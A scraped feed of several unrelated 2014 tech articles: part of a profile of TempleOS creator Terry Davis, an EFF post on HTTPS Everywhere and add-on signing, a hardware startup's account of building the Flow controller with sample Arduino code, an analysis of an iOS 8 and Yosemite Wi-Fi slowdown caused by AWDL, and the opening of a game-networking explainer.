As 64-bit computing began trickling down to desktops around 2003, Davis saw it as the next big disruption. He dusted off some code from ten years earlier, when he’d worked on operating systems for Ticketmaster and tinkered on the side. "It kind of developed on its own," he says, "I didn't plan it."

But the idea of a digital oracle grew out of his earlier methods for talking to God. At first he’d open a Bible to a random page, and it would speak. Yet he had a general sense of where the book had opened, whether he might be choosing from Genesis or Revelation. He began using coin tosses to choose a page number; then he expanded his technique to include all the books in his library. Soon he’d settled on a digital timer for his oracle, AfterEgypt.

He kept the rest of the programming simple. God told him to stick to 640x480 and 16 colors, with only a single audio voice. Like Noah, he built as he was commanded. "It’s really obvious what to do next," he says, "and it can keep you busy for the first ten years." But now he’s finished.

"The way God works is he caused the course of my life. I can see how it's been a charmed life in some ways, so I think He planned it," Davis says. Sometimes he seems to believe TempleOS will exist for 1,000 years, that it will be embraced and perfected by the giants of Silicon Valley, and that he will be recognized as King Solomon 2.0. Other times he seems less certain, even vulnerable to doubt. "Is it going to be as big as Solomon's Temple?" he asks. "I don't know. But we'll see. What else is there?"

<="" em=""><="" em=""> <="" em="">

<="" em=""><="" em="">Gif by the author

He talks to God constantly, and his God is conversational, even chatty. In fact, Davis believes he's proven God speaks to him. He believes anything can be an oracle; that the divine word reveals itself through randomness.

At least a dozen times on his webpage, he describes putting a question to his mother. If he won the lottery three times, he asks, would she believe? No, she responds, because improbable things happen all the time. "I can sit down with my parents and praise God and open the Bible randomly," he says, "and it will talk." For him this is both astounding and undeniable, an ongoing revelation, like winning the lottery ten times every day. Yet, he says, "They just ignore it because it's against their way of thinking. They just ignore the facts."

<="" em=""><="" em="">

Is it going to be as big as Solomon's Temple? I don't know

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

<="" em=""><="" em="">

Terry Davis asks God about war ("Servicemen competing") and death ("awful"), about dinosaurs ("Brontosaurs' feet hurt when stepped") and His favorite video game ("Donkey Kong"). God’s favorite car is a "Beamer," and His favorite singer is Mick Jagger, though if He could sing He’d want to sound like Christopher Hall from Stabbing Westward. His favorite national anthem is Latvia’s. His favorite band is, no surprise, The Beatles, but Rush and Triumph are pretty good, too. Classical music is poison. The best thing Bill Gates could do to save lives, God says, is work on earthquake prediction. The Eleventh Commandment is "Thou shall not litter." Terry Davis tells God everything seems bad. God replies: "Plant trees."

The words pour out on TempleOS.org, a torrent of verified random numbers, news links, YouTube videos, and scriptural exegesis. It’s the dense work of a single, restless mind writing ceaselessly without an audience.

After two months of emails and phone conversations, I know more than when I began; specifically, I’ve accumulated more raw data, more facts about his life and experience. But I suspect I’ve only sketched a shadow. The full reality remains unreachable, an irreducible mystery.

One morning, Davis emailed me about this story, saying, “What people are going to read is, 'It's about a pathetic schizophrenic who made a crappy operating system.' My perspective is, 'God said I made His temple.'" It echoed something he’d written before: "I don't care much about you and your story. It's not likely to be what it actually is—world news with God claiming His temple."

I can’t disagree. Theophany belongs to those who can see, and the rest are barred from its consolation. Davis believes he has proven he can talk to God through random numbers; he calls his parents sheep, because they cannot believe this. The word they—we—have for him is schizophrenic, and the condition is never cured, only treated. Terry Davis has offered the world a temple to a God who speaks only to him, and he is still waiting for everyone else to listen.

Why HTTPS Everywhere isn't on addons.mozilla.org (AMO)

25 November 2014 - 8:00pm
[HTTPS-Everywhere] HTTPS-Everywhere needs to be on firefox addons

Yan Zhu yan at eff.org
Mon Apr 21 11:14:26 PDT 2014

Hi all,

The good news is that HTTPS Everywhere is going in AMO eventually. The question is when.

The main reason I haven't put it in AMO *yet* is because AMO offers *less* security to users than EFF self-hosting it, ironically. AMO doesn't do any code signing for extensions, so they're only protected by HTTPS. As we saw with Heartbleed, SSL private keys can be compromised.

Why wasn't HTTPS Everywhere affected by Heartbleed? Because we sign updates with an offline signing key that EFF keeps on a dedicated airgapped machine. So even if SSL is totally broken, the integrity of updates is guaranteed. Yay!

Luckily the AMO update servers weren't using a vulnerable version of OpenSSL, even though the servers that hosted static files (favicons, etc.) were. Had the update servers been affected by Heartbleed, someone could push a malicious update to almost any addon that you had installed from AMO. This is pretty terrifying, given that a malicious Firefox addon can completely and invisibly pwn your browser.

So there's two situations that would make me comfortable with putting HTTPS Everywhere in AMO:

1. AMO allows us to sign updates with our offline signing key, which is what Chrome Web Store already does. This is *by far* the easiest route from my perspective. I have opened a bug with Mozilla; please star it! https://bugzilla.mozilla.org/show_bug.cgi?id=999014

2. Once public key pinning lands in Firefox (supposedly scheduled to happen this summer), we can sign HTTPS Everywhere with a CA-signed certificate via this arcane process: https://developer.mozilla.org/en-US/docs/Signing_a_XPI. It would take some wrangling to make it work with an offline private key but probably not impossible.

More info inline, but the above was the gist of it.

On 04/20/2014 01:58 PM, Dave Warren wrote:
> On 2014-04-20 12:53, Andrew Sillers wrote:
>> Without further comment, I'll call out:
>> * the FAQ entry on this topic:
>>   https://www.eff.org/https-everywhere/faq#amo
>
> This one doesn't seem to make sense to me. The Mozilla privacy policy
> would only apply to Mozilla possibly keeping track of who downloads the
> add-on, but wouldn't automatically make the add-on start intruding on
> privacy somehow, would it?

This answer is outdated; as mentioned above, the privacy policy isn't the blocker anymore. Will update the FAQ.

> More importantly, if a user is happy with a less restrictive privacy
> policy, what's the problem?

Nothing in particular, except that we realize that users rarely read privacy policies. So there is an argument for developers to provide them with the maximum amount of privacy by default (which is supposedly what we do by not making AMO an option). This is kind of a moot point because I think the popularity benefit of being in AMO outweighs the minor-and-possibly-hypothetical privacy loss.

>> * the extant discussion on this topic in the bug tracker:
>>   https://trac.torproject.org/projects/tor/ticket/9769
>
> While the approval process is a factor, having some code in the rulesets
> that says "Do not apply this rule to versions below 'x'" should negate
> the issue of time-sensitive rules, save for the fact that an
> incompatible rule simply won't run until the extension is updated. A
> small price to pay for making this easy and safe for users.

It seems that you're talking about a tangential issue here, which is whether/how ruleset updates should be hosted if/when we get to a point where ruleset updates are independent from extension updates (which will happen if Zack's GSoC project works out). AFAIK, there is no way in AMO to let us update rulesets without updating the entire extension, so we will need to self-host ruleset updates if we want them to be separate from extension updates.

> As far as signing, the ruleset update signing has already been discussed
> and can still be done separate from rule updates using EFF's key.

Confused here. What's the difference between "ruleset update" and "rule update"?

> It ultimately may not be as simple as just uploading to Mozilla and
> being done with it, but it's pretty close to that and it's not as though
> EFF is releasing frequent enough updates for Mozilla's slight delay to
> be a significant factor, at least IMO.

--
Yan Zhu <yan at eff.org>, <yan at torproject.org>
Staff Technologist
Electronic Frontier Foundation
https://www.eff.org
815 Eddy Street, San Francisco, CA 94109
+1 415 436 9333 x134

More information about the HTTPS-Everywhere mailing list

How we built Flow

25 November 2014 - 8:00pm

We (YC S13) just launched our product “Flow” on Indiegogo. It’s a programmable and intuitive wireless controller that gives you high precision and speed.

This post describes the thinking and development that went into the product. It covers user experience, product design, hardware and software, and should be relevant to any technical or creative person.

Also see Garry Tan’s blog post on why Flow is important for designers and creatives.

If you like Flow, please back our campaign and share it with your friends.

We appreciate your support! Philip, Chirantan, Felix & Tobias

1. The Problem

Our team consists of four people: an electrical engineer, a software engineer, an industrial designer and a UX/UI designer.

We use digital tools like Photoshop, Illustrator, Premiere, Rhino and Eagle on a daily basis.
We need to be fast and we need to be good.

We count on our tools to give us access to our favorite actions in a fast and precise way. We want them to help our flow, not disrupt it. Kind of like a musician focusing on the music rather than the instrument.

That’s not what our work feels like right now.

Example: Photoshop

Brush size control, one of hundreds of repetitive micro-adjustments in Photoshop, hides either behind a right-click popup window with a two-inch slider and a tiny text box, or behind keyboard shortcuts with frustratingly large steps.

This process is extremely repetitive and imprecise; it feels more like sorting through an index card system than focusing on the job at hand. Overall, it’s a time-consuming and frustrating experience.

I’m sure a lot of you can relate to this when you’re cutting at the right frame position in video editing, choosing the right angles in 3D modelling or adjusting the wire thickness in PCB layout.

This ultimately affects productivity and quality. It adds to frustration and reduces joy and fun. Do our tools need to be that way?

2. The User Experience

The frustrations piled up. Looking through this stack, we realised that they arose out of a poorly designed user experience. To correct them, we worked out a manifesto of 11 requirements for our solution.

We needed a programmable, haptic and dedicated device that gives us the same precision, speed and feeling as using our hand.

3. The Design

We tried many different ideas. Some evolved while others did not live up to our requirements. We looked for inspiration in two broad areas:

“Dumb” tools

We looked at everything from everyday things like door knobs and light switches to professional gear like DJ sets and car interiors. We loved the simplicity of knobs and light switches. They are unambiguous and combine multiple senses (like sight, sound and haptics), which reduces your cognitive load and allows you to focus on other things.

“Smart” tools

We also looked at modern input devices. We loved playing around with them, and there were things we really liked about them, but others did not meet our requirements. Some devices were very limited in their functionality while others were overkill for what we needed.

We ultimately worked our way towards a natural, non-intrusive and elegant design that gave us the power, precision and speed that we needed from our tool.

“Good design is as little design as possible: less, but better — because it concentrates on the essential aspects, and the products are not burdened with non-essentials. Back to purity, back to simplicity.” — Dieter Rams

We wanted Flow to feel magical and to let us explore ways to control in 3D space. We used an infrared-based hand recognition sensor, which gave us this ability. At the same time, it gave the device the orientation that we needed.
We chose high quality materials. Turned metal gave us the weight and durability that we needed; acrylic glass the sensitivity and ability to work with capacitive sensing.

4. The Technology

Hardware is hard. This is where design meets engineering. At this point, we had to translate our design requirements into technical specifications.

It is a complex equation of precision, cost, dimensions, ease of implementation, energy efficiency and availability of components. All of these factors have to be carefully assessed, planned for and implemented.

At the time of shipping, your product simply needs to work; there is no bug fixing afterwards. Here are some of the sensors that we used in our prototypes.

Angular Positioning

A potentiometer acts as an adjustable voltage divider, changing its resistance through rotation. Depending on the ADC, it has great resolution, is quite cheap and is very easy to implement. The downside is that it becomes more fragile over time, since it requires a direct mechanical connection.

An incremental hollow shaft encoder emits two overlapping pulse trains at a frequency proportional to the speed of rotation. Speed and direction of rotation are determined by the phase shift between them. Implementation of shaft encoders is quite easy but, depending on the resolution, they can be quite expensive.
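
As a concrete illustration of the two approaches above, here is a minimal Arduino-style sketch; the pin assignments and the 270-degree potentiometer travel are assumptions for illustration, not Flow's actual firmware. It reads a potentiometer through the ADC and decodes a quadrature encoder by sampling channel B on each rising edge of channel A.

// Assumed wiring: pot wiper on A0, encoder channels A/B on pins 2/3.
const int POT_PIN = A0;
const int ENC_A = 2;   // interrupt-capable pin
const int ENC_B = 3;

volatile long encoderTicks = 0;

void onEncoderA() {
  // On a rising edge of A, the level of B gives the direction:
  // B low means A leads B (one direction), B high means B leads A (the other).
  if (digitalRead(ENC_B) == LOW) encoderTicks++;
  else encoderTicks--;
}

void setup() {
  Serial.begin(9600);
  pinMode(ENC_A, INPUT_PULLUP);
  pinMode(ENC_B, INPUT_PULLUP);
  attachInterrupt(digitalPinToInterrupt(ENC_A), onEncoderA, RISING);
}

void loop() {
  int raw = analogRead(POT_PIN);         // 0..1023 on a 10-bit ADC
  float angle = raw * (270.0 / 1023.0);  // assumed 270-degree pot travel
  Serial.print(angle);
  Serial.print(" deg, encoder ticks: ");
  Serial.println(encoderTicks);
  delay(100);
}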

Hall effect sensors measure the strength of a magnetic field through its influence on charged particles, in particular electrons. These sensors are standard components and thus fairly cheap, with great availability. Unfortunately, in our application, hall effect sensors did not show the required measurement accuracy.

Laser sensors are already used in high-precision computer mice, where changes in position are measured by sensing the scattered laser light reflected off an object. These sensors are very precise and minimize the mechanical problems of potentiometers and shaft encoders, since no mechanical connection to the moving object is needed.

Capacitive touch

All of the angular positioning sensors described above are standard components and are therefore quite easy to source and implement. The same does not apply to capacitive touch sensing. Custom circular touch surfaces typically require batch sizes above 10,000, so for our lower volumes we decided to build our own multitouch surface, implemented on the top layer of the PCB. This gives us the freedom to add sensitivity to the areas that need it, react to changes in layout more quickly and keep fixed manufacturing costs low. By following design guidelines for the sensitive electrodes, one can implement keyboards, sliders and rotary wheels. Available ICs on the market, like the Freescale MPR121, already handle all capacitive touch events, which makes integration fairly easy.
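
To make the MPR121 integration concrete, here is a hedged sketch, not Flow's firmware: it assumes the controller's default I2C address (0x5A) and skips the electrode threshold configuration a real design needs. It polls the chip's two touch-status registers and reports which of the 12 electrodes are touched.

#include <Wire.h>

const uint8_t MPR121_ADDR = 0x5A;  // default address; assumes ADDR pin tied to ground

// Registers 0x00/0x01 hold the touch status; bits 0-11 map to electrodes 0-11.
uint16_t readTouchStatus() {
  Wire.beginTransmission(MPR121_ADDR);
  Wire.write(0x00);
  Wire.endTransmission(false);  // repeated start, keep the bus
  Wire.requestFrom(MPR121_ADDR, (uint8_t)2);
  uint16_t status = Wire.read();
  status |= ((uint16_t)Wire.read()) << 8;
  return status & 0x0FFF;
}

void setup() {
  Serial.begin(9600);
  Wire.begin();
  // A real design would also configure touch/release thresholds here.
}

void loop() {
  uint16_t touched = readTouchStatus();
  for (int e = 0; e < 12; e++) {
    if (touched & (1 << e)) {
      Serial.print("electrode ");
      Serial.println(e);
    }
  }
  delay(50);
}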

Hand gesture recognition

Infrared technology is a standard approach for proximity measurement and gesture recognition. IR light is emitted by an LED while a photodiode measures the intensity of the light reflected off an object. By using multiple LEDs, both the distance of objects and their movement parallel to the sensor plane can be measured. This opens the door to simple gesture recognition for movements like waving up or left. Furthermore, IR technology has the advantage of being quite energy efficient, as well as working in complete darkness.
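
A minimal sketch of that idea, with all hardware details assumed (two photodiodes on analog pins, an arbitrary threshold): a hand passing over the sensor trips one channel before the other, and the order of the two peaks gives the swipe direction.

const int IR_LEFT = A1;    // assumed analog pins for the two photodiodes
const int IR_RIGHT = A2;
const int THRESHOLD = 600; // assumed reflection threshold

void setup() {
  Serial.begin(9600);
}

// Wait up to 300 ms for the other channel to trip, which confirms a swipe.
bool reaches(int pin) {
  unsigned long t0 = millis();
  while (millis() - t0 < 300) {
    if (analogRead(pin) > THRESHOLD) return true;
  }
  return false;
}

void loop() {
  bool left = analogRead(IR_LEFT) > THRESHOLD;
  bool right = analogRead(IR_RIGHT) > THRESHOLD;
  if (left && !right && reaches(IR_RIGHT)) Serial.println("swipe left-to-right");
  else if (right && !left && reaches(IR_LEFT)) Serial.println("swipe right-to-left");
}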

PCB Layout

One of the main limitations of hardware is its immutability. Once the PCB and casing are designed and manufactured, the system is fixed; an update is impossible. For that reason, it is very important to choose the right components and manufacturers, and to design with care. Prototyping and testing are extremely important. Fortunately, rapid prototyping platforms like Arduino shorten development time by integrating sensors and their firmware into a proven microcontroller environment.

Bluetooth Smart / Low Energy

The choice of wireless technology was a critical one. There were a number of factors we had to consider before making the decision. It had to be fast. It had to be universal. It had to be energy efficient. After trying out several options, such as ZigBee, Z-Wave, Wi-Fi and Classic Bluetooth, we settled on Bluetooth Low Energy (BLE), also known as Bluetooth Smart.

Energy efficiency: Classic Bluetooth is a well-known and established wireless technology, but it comes with a side effect: energy inefficiency. Bluetooth consumes energy regardless of whether data is being transferred. Enter Bluetooth Low Energy (BLE). It is optimised for low power use at low data rates, with simple lithium coin cell batteries in mind. BLE defeated: WiFi

Designed for Sensor Data Communication: In this great post the author compares the two using simple analogies and real-life examples. BLE’s Central-Peripheral roles and Generic Attribute Profile allow optimal and efficient communication. One might argue that BLE did to Bluetooth Classic what REST did to HTTP. BLE defeated: Bluetooth Classic, WiFi

Widespread acceptance: Bluetooth Low Energy is widely available in modern computers, phones, tablets and other devices. Few people using a modern device need an explanation of what Bluetooth is for. This makes it a universally known and “friendly” technology. BLE defeated: ZigBee, Z-Wave

Developer Friendly: The widespread acceptance is not limited to users; BLE is also a popular technology in the developer community. BLE is clearly designed for infrequent communication of sensor data. Being a universal and developer-friendly technology, it suited Flow, which is a careful assembly of sensor technologies.
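
As a sketch of what the peripheral side can look like, here is a minimal example using the ArduinoBLE library; the service and characteristic UUIDs, the local name, and the sensor read are placeholders, since Flow's actual GATT layout is not public. A central that subscribes to the characteristic receives a notification each time the value is written.

#include <ArduinoBLE.h>

// Hypothetical UUIDs for illustration only.
BLEService dialService("0000fff0-0000-1000-8000-00805f9b34fb");
BLEIntCharacteristic angleChar("0000fff1-0000-1000-8000-00805f9b34fb",
                               BLERead | BLENotify);

void setup() {
  BLE.begin();
  BLE.setLocalName("Flow-sketch");        // placeholder name
  BLE.setAdvertisedService(dialService);
  dialService.addCharacteristic(angleChar);
  BLE.addService(dialService);
  BLE.advertise();                        // peripheral role: advertise and wait
}

void loop() {
  BLEDevice central = BLE.central();
  while (central && central.connected()) {
    int angle = analogRead(A0);   // stand-in for the real sensor reading
    angleChar.writeValue(angle);  // subscribed centrals get a notification
    delay(50);                    // small, infrequent updates suit BLE well
  }
}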

Developers

Flow speaks Bluetooth Low Energy, which is already a very open platform for developers to dive right into. But to make it even easier, we’re building open-source SDKs and configuration software for developers and other users alike to customize and personalize Flow to their liking. We’re building gesture recognition algorithms aimed at speed and precision, allowing developers to focus on applications rather than delving into the interpretation of complex sensor data. AppleScript opened doors to a new genre of applications. Being able to communicate with OSX applications that were not designed to be open was a breakthrough. However, not many have been able to tap into its potential. Flow presents a unique opportunity for developers here. Developers will be able to write their own AppleScripts, shell scripts and keyboard shortcuts, and map them to Flow’s gestures using our SDK.
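
The SDK is not released yet, so purely as an illustration of the mapping idea, here is a tiny C++ sketch that dispatches recognized gesture names to user-supplied shell commands or AppleScript one-liners; the gesture names and bindings are hypothetical.

#include <cstdlib>
#include <map>
#include <string>

int main() {
  // Hypothetical gesture-name-to-action bindings a user might configure.
  std::map<std::string, std::string> bindings = {
    {"turn_cw", "osascript -e 'display notification \"brush size +5\"'"},
    {"swipe_up", "open -a 'Mission Control'"},
  };

  std::string gesture = "swipe_up";  // would come from the SDK's gesture callback
  auto it = bindings.find(gesture);
  if (it != bindings.end()) {
    std::system(it->second.c_str()); // run the bound action
  }
  return 0;
}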

5. Flow

If you’re interested in the final product and if you like Flow, please back our campaign and share it with your friends.

We appreciate your support! Philip, Chirantan, Felix & Tobias

WiFried: iOS 8 WiFi Issue

25 November 2014 - 8:00am
WiFried: iOS 8 WiFi Issue

Thanks to @alisa_a for the suggestion on the wavy bacon. Bonjour over AWDL? Please no.

There are many internet forums with thousands of users scratching their heads, wondering if the reason their WiFi performance is severely degraded on iOS 8 is because of their router, their DNS settings (please help these folks the most), that they need to reset their network settings, and more.

I’ve narrowed down the issue to the use of Apple’s Wireless Direct Link (AWDL) that is used for AirDrop, AirPlay, and Gaming connections.

I’ll go out on a limb and say the WiFi issues are because of Apple’s choice of using Bonjour over AWDL and that, given the constraints of the WiFi hardware, this will be difficult to get right. But perhaps I’m crazy, and this is just a bug that can be fixed by Apple.

Apple: Keep Bonjour over Bluetooth and connected WiFi networks. Are there really justifiable gains by advertising and browsing for services over WiFi vs Bluetooth? And if I missed something, it needs to work without interference.

I’ve confirmed this severe WiFi degradation issue still occurs on iOS 8.1.1 and OSX 10.10.1. This is not fixed.

Background

What is AWDL?

AWDL (Apple Wireless Direct Link) is a low latency/high speed WiFi peer-to-peer connection Apple uses everywhere you’d expect: AirDrop, GameKit (which also uses Bluetooth), AirPlay, and perhaps elsewhere. It works using its own dedicated network interface, typically “awdl0”.

While some services, like Instant HotSpot, Bluetooth Tethering (of course), and GameKit advertise their services over Bluetooth SDP, Apple decided to advertise AirDrop over WiFi and inadvertently destroyed WiFi performance for millions of Yosemite and iOS 8 users.

How does AWDL work?

Since the iPhone 4, the iOS kernels have had multiple WiFi interfaces on top of a single Broadcom WiFi hardware chip.

en0 — primary WiFi interface
ap1 — access point interface used for WiFi tethering
awdl0 — Apple Wireless Direct Link interface (since iOS 7?)

By having multiple interfaces, Apple is able to have your standard WiFi connection on en0, while still broadcasting, browsing, and resolving peer to peer connections on awdl0 (just not well).

2 Channels at the same time!

At any one time, the WiFi chip can only communicate on one frequency. Thus, both interfaces need to be on the same channel when attempting to use them at the same time. This typically works well when two devices are near each other, as they are more than likely connected to the same access point using the same channel.

I did do some tests with two devices connected to different channels (one 5GHz and one 2.4GHz) and they were still able to AirDrop successfully (wow, Apple), albeit with obvious transfer chunking and at about half the normal transfer rate achieved when both devices are on the same channel.

P2P device services happen in discoveryd

discoveryd, previously named mDNSResponder, loads the D2D plugins located in /System/Library/PrivateFrameworks/DeviceToDeviceManager.framework/PlugIns/. The specific one causing the issue is WiFiD2DPlugin.bundle.

Currently there are two plugins, one for WiFi and one for Bluetooth. As I mentioned above, some services, such as Instant Hotspot, broadcast over the Bluetooth interface, while others such as AirDrop, AirPlay, and GameKit may broadcast on multiple interfaces, including the Bluetooth, AWDL, and of course standard en0 WiFi interfaces.

Reproducing the WiFi Performance Issues

WiFi Jittery/Slow Transfer Speeds

The performance degradation is the bigger of the two symptoms. Once I understood what to look for, it was simple to address/fix, but it was a long journey to get here.

When the device is advertising and browsing for services, there is interference with the WiFi transmission, or perhaps some kind of TDMA of the WiFi chip to support multiple interfaces. The performance effects are very apparent and easy to reproduce.

iOS 8 WiFi Performance Issue — Comparison Video

Effects of AWDL on iOS 8 WiFi Performance

To reproduce this issue on any iPhone

Perform a speed test (there are many apps to choose from) and simply pull open Control Center. This causes the discoveryd process to browse and advertise services over your WiFi interface. You’ll see an immediate reduction in WiFi speeds that continues for a minute or two while the AWDL interface keeps browsing/advertising. This occurs whether Bluetooth is turned on or off, so it doesn’t appear to be a Bluetooth coexistence issue (where Bluetooth and WiFi overlap frequencies and, in this case, also use the same chip).

Even more interesting is that you can cause an issue with a nearby device. Instead of opening Control Center on the speed testing device, I’ve successfully induced the WiFi issues by simply waking a nearby iOS device. The waking process itself begins a browse and advertise of services that affects other nearby devices.

Slow Ping (”SSH bug”)

On an iPhone 5S, you’ll consistently see ping times go up to 2 seconds on every other ping. (Yes, nobody cares much about pings, but this affects performance too.) For those in the JB community, I believe this is what folks have been referring to as the “SSH bug”. The issue causes a 1–2 second delay on “every” key. Interestingly, when you send data often, the ping latency goes away, i.e. if you type quickly for a long period, the connection will be fast. If you press a key once a second, you’ll notice a 2-second delay after each key.

This issue occurs when the kernel disables AWDL, which seems very odd. The system log shows: kernel[0]: 000606.348321 wlan0.W[221] IO80211AWDLPeerManager::doMonitorTimer(): Disabling AWDL due to no services and idle link.

To reproduce this issue on an iPhone 5S

On your iPhone 5S, the easiest way to reproduce the ping/SSH issue is to set AirDrop to “Off” in Control Center and pull Control Center open and closed. Wait about 20–60 seconds with the phone screen off or on. It’s best to perform this with no other iOS devices nearby, or at least with their Bluetooth off. It seems that AWDL will remain around longer when “devices present”, per the kernel log statements in the system log. It’s these specific environmental factors that made narrowing down the root cause so difficult, and I’m sure they have caused issues for Apple in trying to locate it as well.

Once the problem begins, it will go away each time services are advertised, browsed, or resolved. In layman’s terms, just open up Control Center again and the ping time will go back to normal (until it’s closed and then another ~20 seconds until the kernel disables AWDL).

AirDrop Everyone vs Contacts Only vs Off

There are some specific nuances surrounding whether AirDrop is set to advertise to no one, contacts only, or everyone. However, whichever you choose, the issue still remains, just in different sequences/time periods/etc.

Bouncing WiFi/Re-associating WiFi

Part of the confusion over what the “fix” was is due to the fact that when the iOS device reconnects to an AP (either by turning WiFi off/on on the phone or by Forget/reconnect), some of the AWDL characteristics are reset/disabled for a period of time.

Thus, WiFi performance is restored to 100% upon a WiFi bounce, until discoveryd begins its browse/advertise routines again, causing the performance degradation and, on the 5S, the ping lag issue once the kernel disables AWDL.

Until I figured this out, this made it quite difficult when troubleshooting!

A fix for iOS WiFi

How often do you actually use AirDrop or play games with a nearby device or do AirPlay directly to another device (where you’re not connected to the same WiFi)? I’ve used AirDrop once. It was cool, I enjoyed it, but not worth the WiFi issues it’s causing.

I’ve created a disable feature and conveniently located it in the AirDrop menu located in the Control Center. If you’re jailbroken, you can pick this up in Cydia for free. It’s called “WiFried”.

WiFried will allow you to enable/disable your D2DWiFi/AWDL and can be conveniently turned off/on under the AirDrop settings in Control Center.

I’ll post the source on GitHub shortly.

One Last Thing…

Yosemite WiFi Issues Fix

This issue with D2D/AWDL is the same root cause of the severe WiFi performance degradation affecting users on Yosemite (and it continues on 10.10.1). AirDrop was introduced in OSX Lion and used AWDL, and AirDrop and AWDL have been active since iOS 7, yet the issue seems to have suddenly appeared in iOS 8; perhaps with its release there’s more code sharing, or just some bad new code.

@rpetrich mentioned that AirDrop used to be two incompatible, but identically named, protocols until Yosemite/iOS 8. Perhaps this and the changes for Continuity introduced bugs in this area.

Turning off AWDL

Perhaps not surprising for Apple users, you actually can’t easily (see below) turn off AWDL/AirDrop in Yosemite. You can remove it from the left side of Finder, but that doesn’t fix the issue. Apple? User choice?

Either way, you can fix your Yosemite WiFi issues, at the cost of disabling AWDL and AirDrop, by typing the following command at the OSX terminal:

sudo ifconfig awdl0 down

And vice versa to restore AirDrop and AWDL (and the WiFi issues):

sudo ifconfig awdl0 up

For clarification: that’s “a w d (lowercase L) (number zero)”

Update: Older Macs/MacBooks may not have this interface on Yosemite due to hardware incompatibilities. Based on http://recode.net/2014/10/16/os-x-yosemite-arrives-what-does-it-mean-for-older-macs/, it looks like they don’t have full AirDrop and probably don’t support AWDL.

More Hackers Wanted:

I reversed most of the iOS-related frameworks and, through trial and error, have determined this is mostly a kernel/driver issue. There’s not much in the iOS userland code except the initiation of advertising, browsing, and resolving. I just glanced at the Yosemite version and there are more details in there on how this works. If you are so inclined, fire up IDA and take a look at the following framework. Perhaps you’ll be able to figure out more details.

/System/Library/PrivateFrameworks/DeviceToDeviceManager.framework/PlugIns/awdl_d2d.bundle/Contents/MacOS/awdl_d2d

Last Updated: November 24, 2014

@mariociabarra

What every programmer needs to know about game networking

25 November 2014 - 8:00am

Introduction

You’re a programmer. Have you ever wondered how multiplayer games work?

From the outside it seems magical: two or more players sharing a consistent experience across the network like they actually exist together in the same virtual world. But as programmers we know the truth of what is actually going on underneath is quite different from what you see. It turns out that it’s all an illusion. A massive sleight-of-hand. What you perceive as a shared reality is only an approximation unique to your own point of view and place in time.

Peer-to-Peer Lockstep

In the beginning, games were networked peer-to-peer, with each computer exchanging information with the others in a fully connected mesh topology. You can still see this model alive today in RTS games, and interestingly, perhaps because it was the first way, it’s still how most people think game networking works.

The basic idea is to abstract the game into a series of turns and a set of command messages that, when processed at the beginning of each turn, direct the evolution of the game state. For example: move unit, attack unit, construct building. All that is needed to network this is to run exactly the same set of commands and turns on each player’s machine starting from a common initial state.

Of course this is an overly simplistic explanation and glosses over many subtle points, but it gets across the basic idea of how networking for RTS games works. You can read more about this networking model here: 1500 Archers on a 28.8: Network Programming in Age of Empires and Beyond.
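
A minimal sketch of the lockstep loop just described; the types and structure are assumptions for illustration, not taken from any particular engine. Each peer buffers the commands for a turn and simulates the turn only once every player's commands have arrived.

#include <cstdint>
#include <map>
#include <vector>

struct Command { uint8_t playerId; uint8_t type; uint32_t targetId; };

struct LockstepSim {
  uint32_t currentTurn = 0;
  int numPlayers;
  // commands[turn][player] = that player's commands for the turn
  std::map<uint32_t, std::map<uint8_t, std::vector<Command>>> commands;

  explicit LockstepSim(int players) : numPlayers(players) {}

  void receive(uint32_t turn, uint8_t player, std::vector<Command> cmds) {
    commands[turn][player] = std::move(cmds);
  }

  bool turnReady() const {
    auto it = commands.find(currentTurn);
    return it != commands.end() && (int)it->second.size() == numPlayers;
  }

  void tick() {
    if (!turnReady()) return;  // still waiting on the most lagged player
    for (auto& entry : commands[currentTurn])
      for (const Command& c : entry.second)
        apply(c);  // must be fully deterministic on every machine
    commands.erase(currentTurn);
    ++currentTurn;
  }

  void apply(const Command&) { /* move unit, attack unit, construct building */ }
};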

It seems so simple and elegant, but unfortunately there are several limitations.

First, it’s exceptionally difficult to ensure that a game is completely deterministic; that each turn plays out identically on each machine. For example, one unit could take a slightly different path on two machines, arriving sooner to a battle and saving the day on one machine, while arriving later on the other and, erm, not saving the day. Like a butterfly flapping its wings and causing a hurricane on the other side of the world, one tiny difference results in complete desynchronization over time.

The next limitation is that in order to ensure the game plays out identically on all machines, it is necessary to wait until all players’ commands for that turn are received before simulating that turn. This means that each player in the game has latency equal to the most lagged player. RTS games typically hide this by providing audio feedback immediately and/or playing cosmetic animations, but ultimately any action that truly affects the game may occur only after this delay has passed.

The final limitation occurs because of the way the game synchronizes by sending just the command messages which change the state. In order for this to work, it is necessary for all players to start from the same initial state. Typically this means that each player must join up in a lobby before commencing play. Although it is technically possible to support late join, it is not common due to the difficulty of capturing and transmitting a completely deterministic starting point in the middle of a live game.

Despite these limitations this model naturally suits RTS games and it still lives on today in games like “Command and Conquer”, “Age of Empires” and “Starcraft”. The reason being that in RTS games the game state consists of many thousands of units and is simply too large to exchange between players. These games have no choice but to exchange the commands which drive the evolution of the game state.

But for other genres, the state of the art has moved on. So that’s it for the deterministic peer-to-peer lockstep networking model. Now let’s look at the evolution of action games, starting with Doom, Quake and Unreal.

Client/Server

In the era of action games, the limitations of peer-to-peer lockstep became apparent in Doom, which despite playing well over the LAN played terribly over the internet for typical users:

Although it is possible to connect two DOOM machines together across the Internet using a modem link, the resulting game will be slow, ranging from the unplayable (e.g. a 14.4Kbps PPP connection) to the marginally playable (e.g. a 28.8Kbps modem running a Compressed SLIP driver). Since these sorts of connections are of only marginal utility, this document will focus only on direct net connections. (faqs.org)

The problem of course was that Doom was designed for networking over LAN only, and used the peer-to-peer lockstep model described previously for RTS games. Each turn, player inputs (key presses, etc.) were exchanged with the other peers, and before any player could simulate a frame, all other players’ key presses needed to be received.

In other words, before you could turn, move or shoot you had to wait for the inputs from the most lagged modem player. Just imagine the wailing and gnashing of teeth that this would have resulted in for the sort of folks who wrote above that “these sorts of connections are of only marginal utility”.

In order to move beyond the LAN and the well connected elite at university networks and large companies, it was necessary to change the model. And in 1996, that’s exactly what John Carmack did when he released Quake using client/server instead of peer-to-peer.

